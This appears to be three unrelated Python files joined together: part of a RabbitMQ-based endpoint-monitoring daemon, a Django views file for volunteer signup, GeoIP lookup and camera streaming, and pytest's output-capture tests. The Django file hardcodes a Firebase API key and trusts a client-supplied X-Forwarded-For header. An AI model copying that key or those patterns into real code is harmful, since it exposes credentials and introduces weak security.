# dev hash attached to end of routing key
dev_hash = itype.split('.')[-1]
prev_class = self.check_db(dev_hash, 'dev_classification')
monitoring_id = self.monitoring[dev_hash]
temp_d = {dev_hash: monitoring_id}
# self.stop_monitor(monitoring_id)
self.stop_monitor(temp_d)
self.logger.debug('stopping monitoring on:' + itype)
self.logger.debug('classified as:{0}'.format(ivalue))
self.logger.debug('classified previously {0}'.format(prev_class))
if ivalue == prev_class:
self.logger.debug(
'***** allowing endpoint {0}:{1}'.format(itype, temp_d))
self.endpoint_allow(temp_d)
else:
self.logger.debug(
'***** shutting down endpoint:{0}:{1}'.format(itype, temp_d))
self.endpoint_shutdown(temp_d)
def make_rabbit_connection(self, host, exchange, queue_name, keys): # pragma: no cover
'''
Continuously loops trying to connect to rabbitmq,
once connected declares the exchange and queue for
processing algorithm results.
'''
wait = True
channel = None
connection = None
while wait:
try:
connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host))
channel = connection.channel()
channel.exchange_declare(exchange=exchange, type='topic')
channel.queue_declare(queue=queue_name, exclusive=True)
self.logger.debug('connected to {0} rabbitMQ'.format(host))
wait = False
except Exception as e:
self.logger.debug('waiting for {0} rabbitQM'.format(host))
self.logger.debug(str(e))
time.sleep(2)
wait = True
if isinstance(keys, types.ListType):
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, types.StringType):
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
channel.queue_bind(exchange=exchange,
queue=queue_name, routing_key=keys)
return channel, connection
def init_rabbit(self): # pragma: no cover
''' init_rabbit '''
host = 'poseidon-rabbit'
exchange = 'topic-poseidon-internal'
queue_name = 'poseidon_main'
binding_key = ['poseidon.algos.#', 'poseidon.action.#']
retval = self.make_rabbit_connection(
host, exchange, queue_name, binding_key)
self.rabbit_channel_local = retval[0]
self.rabbit_connection_local = retval[1]
host = 'poseidon-vent'
exchange = 'topic-vent-poseidon'
queue_name = 'vent_poseidon'
binding_key = ['vent.#']
'''
retval = self.make_rabbit_connection(
host, exchange, queue_name, binding_key)
self.rabbit_channel_vent = retval[0]
self.rabbit_connection_vent = retval[1]
'''
def start_channel(self, channel, mycallback, queue):
''' handle threading for a messagetype '''
self.logger.debug('about to start channel {0}'.format(channel))
channel.basic_consume(
partial(mycallback, q=self.m_queue), queue=queue, no_ack=True)
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
def do_work(self, item):
'''schuffle item to the correct handlers'''
itype, ivalue = self.make_type_val(item)
self.handle_item(itype, ivalue)
handle_list = self.Scheduler.get_handlers(itype)
if handle_list is not None:
for handle in handle_list:
handle(ivalue)
handle_list = self.Investigator.get_handlers(itype)
if handle_list is not None:
for handle in handle_list:
handle(ivalue)
def process(self):
''' processing loop '''
testing_loop = 10
flag = False
if getenv('PRODUCTION', 'False') == 'True':
flag = True
self.logger.debug('PRODUCTION = {0}'.format(
getenv('PRODDUCTION', 'False')))
while not self.shutdown and testing_loop > 0:
item = None
workfound = False
start = time.clock()
time.sleep(1)
if not flag:
testing_loop = testing_loop - 1
# type , value
self.logger.debug('about to look for work')
try:
item = self.m_queue.get(False)
self.logger.debug('item:{0}'.format(item))
self.logger.debug('found work')
workfound = True
except Queue.Empty:
pass
self.logger.debug('done looking for work!')
if workfound: # pragma no cover
self.do_work(item)
self.print_state()
elapsed = time.clock()
elapsed = elapsed - start
log_line = 'time to run eventloop is {0} ms' .format(
elapsed * 1000)
self.logger.debug(log_line)
self.logger.debug('Shutting Down')
def print_state(self):
self.logger.debug('**********MONITORING**********')
for my_hash, my_value in self.monitoring.iteritems():
self.logger.debug('M:{0}:{1}'.format(my_hash, my_value))
self.logger.debug('***********SHUTDOWN***********')
for my_hash, my_value in self.shutdown.iteritems():
self.logger.debug('S:{0}:{1}'.format(my_hash, my_value))
self.logger.debug('******************************')
def main(skip_rabbit=False):
''' main function '''
pmain = PoseidonMain(skip_rabbit=skip_rabbit)
if not skip_rabbit:
pmain.init_rabbit()
pmain.start_channel(pmain.rabbit_channel_local,
callback, 'poseidon_main')
# def start_channel(self, channel, callback, queue):
pmain.process()
return True
if __name__ == '__main__': # pragma: no cover
main(skip_rabbit=False)
|
views.py | from django.shortcuts import render, redirect
from django.http import HttpResponse, StreamingHttpResponse
import threading
import pyrebase
import cv2
from django.contrib.gis.geoip2 import GeoIP2
from .forms import *
from itertools import chain
# from . import db_models as db_method
###########################-FIREBASE SETUP-##############################################
config = {
"apiKey": "AIzaSyBOXMMnldokTRL1y6Je7sYGx8AFVkNRXRY",
"authDomain": "smartglass-e01ec.firebaseapp.com",
"databaseURL": "https://smartglass-e01ec.firebaseio.com",
"storageBucket": "smartglass-e01ec.appspot.com"
}
# enabling important global variables
firebase = pyrebase.initialize_app(config)
auth = firebase.auth()
db = firebase.database()
##########################################################################################
#---- Firebase authentication service ----#
def signIn(request):
return render(request, "login.html")
def postsign(request):
email=request.POST.get('email')
passw = request.POST.get("pass")
try:
user = auth.sign_in_with_email_and_password(email,passw)
except:
message = "Invalid credentials!"
return render(request,"login.html",{"msg":message})
return render(request, "welcome.html", {})
#---- New Volunteer Signup----#
def volunteer_signup(request):
if request.method == 'POST':
ip = get_client_ip(request)
g = GeoIP2()
dataset = g.city(str(ip))
# dataset = g.city('182.50.69.11')
# store new volunteer in Firebase
if dataset == '127.0.0.1':
dataset = '67.134.204.29'
vol_form = VolunteerForm(request.POST)
if vol_form.is_valid():
vol_data = {
'First_Name':vol_form.cleaned_data['First_Name'],
'Last_Name':vol_form.cleaned_data['Last_Name'],
'Email':vol_form.cleaned_data['Email'],
'Age':vol_form.cleaned_data['Age'],
'Gender':vol_form.cleaned_data['Gender'],
'Latitude':dataset.get('latitude', None),
'Longitude':dataset.get('longitude', None),
'City':dataset.get('city', None)
}
# The .push method generates a unique timestamp key ; no need for hash
db.child("Volunteers").push(vol_data)
return render(request, 'thank_you.html', vol_data)
return render(request, 'thank_you.html', {})
else:
locations = get_locations()
context = {
'profile_form':VolunteerForm(),
'my_array': locations
}
return render(request, 'new_volunteer.html', context)
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
# # returns a list of coordinates to be encoded into GeoJSON
def get_locations():
location_list = []
all_users = db.child("Volunteers").get()
for user in all_users.each():
pair = ((user.val().get('City')), (user.val().get('Latitude')), (user.val().get('Longitude')))
if pair in location_list:
pass
else:
location_list.append(pair)
# location_list is a list of unique pairs of tuples denoting different locations
# now to convert location list from dictionary back into list
location_list = list(chain.from_iterable(location_list))
return location_list
###########################-ADMIN BASED VIEWS-##############################################
def admin_welcome(request):
return render(request, 'welcome.html', {})
def start_live(request):
return render(request, 'live_feed.html', {})
def start_live_feed(request):
return StreamingHttpResponse(gen(VideoCamera()), content_type="multipart/x-mixed-replace; boundary=frame")
# object that brings in the view from the drone
class VideoCamera(object):
def __init__(self):
self.video = cv2.VideoCapture(0)
(self.grabbed, self.frame) = self.video.read()
threading.Thread(target=self.update, args=()).start()
def __del__(self):
self.video.release()
def get_frame(self):
image = self.frame
ret, jpeg = cv2.imencode('.jpg', image)
return jpeg.tobytes()
def update(self):
while True:
(self.grabbed, self.frame) = self.video.read()
cam = VideoCamera()
def gen(camera):
while True:
frame = cam.get_frame()
yield(b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n') |
test_capture.py | import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureFixture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.monkeypatch import MonkeyPatch
from _pytest.pytester import Pytester
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def StdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0) if in_ else None,
out=capture.SysCapture(1) if out else None,
err=capture.SysCapture(2) if err else None,
)
def TeeStdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0, tee=True) if in_ else None,
out=capture.SysCapture(1, tee=True) if out else None,
err=capture.SysCapture(2, tee=True) if err else None,
)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method) -> None:
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(pytester: Pytester, method: str) -> None:
obj = "'b\u00f6y'"
pytester.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = pytester.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(pytester: Pytester, method: str) -> None:
pytester.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = pytester.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = pytester.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = pytester.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = pytester.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = pytester.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = pytester.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = pytester.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = pytester.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = pytester.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = pytester.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = pytester.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, pytester: Pytester, opt) -> None:
reprec = pytester.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, pytester: Pytester) -> None:
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
pytester.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(
self, pytester: Pytester, method
) -> None:
p = pytester.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, pytester: Pytester) -> None:
reprec = pytester.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
def test_cafd_preserves_newlines(self, capfd, nl) -> None:
print("test", end=nl)
out, err = capfd.readouterr()
assert out.endswith(nl)
def test_capfdbinary(self, pytester: Pytester) -> None:
reprec = pytester.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = pytester.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = pytester.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = pytester.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, pytester: Pytester) -> None:
"""#14"""
p = pytester.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = pytester.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(
self, pytester: Pytester, fixture: str, no_capture: bool
) -> None:
pytester.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = pytester.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
def test_disabled_capture_fixture_twice(self, pytester: Pytester) -> None:
"""Test that an inner disabled() exit doesn't undo an outer disabled().
Issue #7148.
"""
pytester.makepyfile(
"""
def test_disabled(capfd):
print('captured before')
with capfd.disabled():
print('while capture is disabled 1')
with capfd.disabled():
print('while capture is disabled 2')
print('while capture is disabled 1 after')
print('captured after')
assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
"""
)
result = pytester.runpytest_subprocess()
result.stdout.fnmatch_lines(
[
"*while capture is disabled 1",
"*while capture is disabled 2",
"*while capture is disabled 1 after",
],
consecutive=True,
)
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, pytester: Pytester, fixture) -> None:
"""Ensure that capsys and capfd can be used by other fixtures during
setup and teardown."""
pytester.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = pytester.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(
self, pytester: Pytester, cap
) -> None:
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
pytester.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = pytester.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(pytester: Pytester) -> None:
sub1 = pytester.mkpydir("sub1")
sub1.joinpath("conftest.py").write_text(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.joinpath("test_mod.py").write_text("def test_func1(): pass")
result = pytester.runpytest(pytester.path, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(pytester: Pytester) -> None:
pytester.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
pytester.makepyfile("def test_func(): pass")
result = pytester.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(pytester: Pytester) -> None:
pytester.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = pytester.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(pytester: Pytester) -> None:
pytester.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
pytester.makepyfile("def test_func(): pass")
result = pytester.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(pytester: Pytester) -> None:
pytester.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = pytester.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(pytester: Pytester) -> None:
"""Make sure we suspend capturing if errors occur during readouterr"""
pytester.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = pytester.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self) -> None:
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self) -> None:
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self) -> None:
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
def test_text(self) -> None:
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self) -> None:
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput() -> None:
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
def test_captureresult() -> None:
cr = CaptureResult("out", "err")
assert len(cr) == 2
assert cr.out == "out"
assert cr.err == "err"
out, err = cr
assert out == "out"
assert err == "err"
assert cr[0] == "out"
assert cr[1] == "err"
assert cr == cr
assert cr == CaptureResult("out", "err")
assert cr != CaptureResult("wrong", "err")
assert cr == ("out", "err")
assert cr != ("out", "wrong")
assert hash(cr) == hash(CaptureResult("out", "err"))
assert hash(cr) == hash(("out", "err"))
assert hash(cr) != hash(("out", "wrong"))
assert cr < ("z",)
assert cr < ("z", "b")
assert cr < ("z", "b", "c")
assert cr.count("err") == 1
assert cr.count("wrong") == 0
assert cr.index("err") == 1
with pytest.raises(ValueError):
assert cr.index("wrong") == 0
assert next(iter(cr)) == "out"
assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(pytester: Pytester) -> Generator[BinaryIO, None, None]:
f = pytester.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip(f"could not run 'lsof' ({exc!r})")
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile: BinaryIO) -> None:
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
pytest.raises(AssertionError, cap.snap)
cap.done()
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile: BinaryIO) -> None:
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, pytester: Pytester) -> None:
with lsof_check():
with pytester.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile: BinaryIO) -> None:
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(AssertionError, cap.start)
def test_stderr(self) -> None:
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self) -> None:
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile: BinaryIO) -> None:
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self) -> None:
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
